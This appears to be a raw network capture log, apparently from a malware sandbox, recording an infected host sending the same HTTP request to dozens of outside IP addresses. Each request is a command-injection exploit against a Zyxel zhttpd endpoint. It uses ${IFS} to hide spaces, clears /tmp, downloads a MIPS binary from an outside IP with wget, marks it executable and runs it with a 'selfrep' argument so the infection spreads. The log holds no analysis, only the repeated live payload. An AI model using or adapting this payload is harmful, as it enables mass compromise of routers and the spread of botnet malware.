                                      Jan 19, 2024 17:29:37.884341955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5753192.168.2.1445546173.166.110.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884371996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5754192.168.2.1459238143.201.218.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884397984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5755192.168.2.1439420137.102.117.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884490013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5756192.168.2.1434554170.189.188.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884521961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5757192.168.2.1442800172.188.48.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884582043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5758192.168.2.1442490103.38.138.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884605885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5759192.168.2.145684836.173.69.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884660006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5760192.168.2.144818666.237.244.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884701014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5761192.168.2.1450166170.154.190.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884748936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5762192.168.2.1452412181.232.88.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884795904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5763192.168.2.1437618193.32.13.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884843111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5764192.168.2.1432948150.5.82.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884890079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5765192.168.2.1439926190.98.184.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884932041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5766192.168.2.1443836178.118.67.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.884980917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5767192.168.2.144929677.205.216.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885015965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5768192.168.2.143311296.177.249.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885066986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5769192.168.2.1436550192.220.86.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885123968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5770192.168.2.1452388125.206.6.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885159969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5771192.168.2.1441612162.165.30.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885198116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5772192.168.2.1457938126.237.193.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885231018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5773192.168.2.1438876221.233.138.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885268927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5774192.168.2.1459524114.145.218.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885305882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5775192.168.2.143738283.123.46.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885364056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5776192.168.2.145948234.217.113.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885386944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5777192.168.2.146051240.184.2.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885420084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5778192.168.2.1437558153.81.184.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885452986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5779192.168.2.144898062.136.227.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885498047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5780192.168.2.145185884.183.144.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885560036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5781192.168.2.144516277.197.92.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885577917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5782192.168.2.1441094162.54.175.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885636091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5783192.168.2.143856463.40.5.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885690928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5784192.168.2.1439272110.114.177.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885731936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5785192.168.2.144938463.12.204.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885765076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5786192.168.2.144655493.114.141.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885818005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5787192.168.2.1433714118.139.137.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885868073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5788192.168.2.1435410178.18.92.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885896921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5789192.168.2.1445848201.45.244.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885932922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5790192.168.2.1457542201.249.134.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.885967970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5791192.168.2.144092651.255.139.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886004925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5792192.168.2.144874623.115.79.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886061907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5793192.168.2.1440942194.227.148.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886102915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5794192.168.2.146026864.186.203.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886173964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5795192.168.2.145010818.244.89.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886224985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5796192.168.2.1451178149.2.247.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886265039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5797192.168.2.145043249.158.101.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886305094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5798192.168.2.1433820220.190.234.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886347055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5799192.168.2.1445464207.49.117.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886385918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5800192.168.2.1448746222.245.169.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886395931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5801192.168.2.1454202192.229.91.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886459112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5802192.168.2.144175470.244.78.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886495113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5803192.168.2.1448892152.56.246.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886529922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5804192.168.2.144372880.105.194.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886560917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5805192.168.2.145921450.63.239.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886593103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5806192.168.2.145040643.103.1.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886630058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5807192.168.2.1432786189.208.209.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886673927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5808192.168.2.1433484180.175.222.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886703968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5809192.168.2.1453292179.213.207.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886740923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5810192.168.2.1432856140.66.77.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886790991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5811192.168.2.143317045.115.22.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886816978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5812192.168.2.145247037.187.6.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886840105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5813192.168.2.144614449.113.81.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886888981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5814192.168.2.146024267.111.152.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886936903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5815192.168.2.143597419.185.52.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.886961937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5816192.168.2.1449258177.239.159.14443
                                      TimestampBytes transferredDirectionData
